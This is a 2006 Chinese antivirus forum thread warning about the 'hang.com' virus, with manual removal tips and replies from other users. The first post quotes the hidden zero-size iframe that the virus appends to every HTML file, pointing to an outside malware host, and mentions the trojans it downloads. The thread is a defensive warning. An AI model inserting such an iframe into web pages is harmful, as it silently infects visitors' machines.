瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » 【警告】危险度极高 发现hang.com新病毒(内详解)
灭天之子 - 2006-11-5 19:16:00
一旦被hang.com文件感染后
客户端 所有硬盘 注意是所有htm html文件
都会在末段 添加如下代码:
<iframe src="http://qq.ee28.cn/htm/" width="0" height="0" frameborder="0"></iframe>

即使杀毒后 如果启动带有 html的相关软件 就会染毒
例如:下载软件->网页链接->右键"使用XX软件下载"->会调用 geturlall.htm文件->染毒
===========================================
感染后 hang.com还会自动下载其它病毒 目前发现是捆绑了 橙色8月 和 一个征途木马
系统服务 会增加 network logon

================================
清除办法 目前只能手动 删除hang.com
下载橙色8月专杀
征途木马 手动清除 请自行搜索

不要再使用htm html文件 等待专杀出现
================

俺在俺村俺最牛 - 2006-11-5 19:18:00
.............
轮回了一把 - 2006-11-5 19:26:00
现在的病毒越练越变态
猪知山 - 2006-11-5 19:41:00
。。。
这么严重。。。
灭天之子 - 2006-11-5 21:21:00
顶起让更多人小心
灭天之子 - 2006-11-6 23:14:00
哎 现在瑞星还是没反应 更新后 还是无法杀
暂时 添加到 HOSTS黑名单 防毒
Radios - 2006-11-7 0:32:00
晕,我的是heng.exe heng.com
爱好者-1 - 2006-11-7 0:41:00
我杀了无数回,
灭天之子 - 2006-11-7 12:37:00
又更新了 RS 不知道 能杀不
封刀为红颜 - 2006-11-7 16:38:00
.....
天涯の過客 - 2006-11-7 16:48:00
ding
灭天之子 - 2006-11-7 23:24:00
RS还是杀不了 真不知道工程师在干吗
已经 样本已经发5天了
1
查看完整版本: 【警告】危险度极高 发现hang.com新病毒(内详解)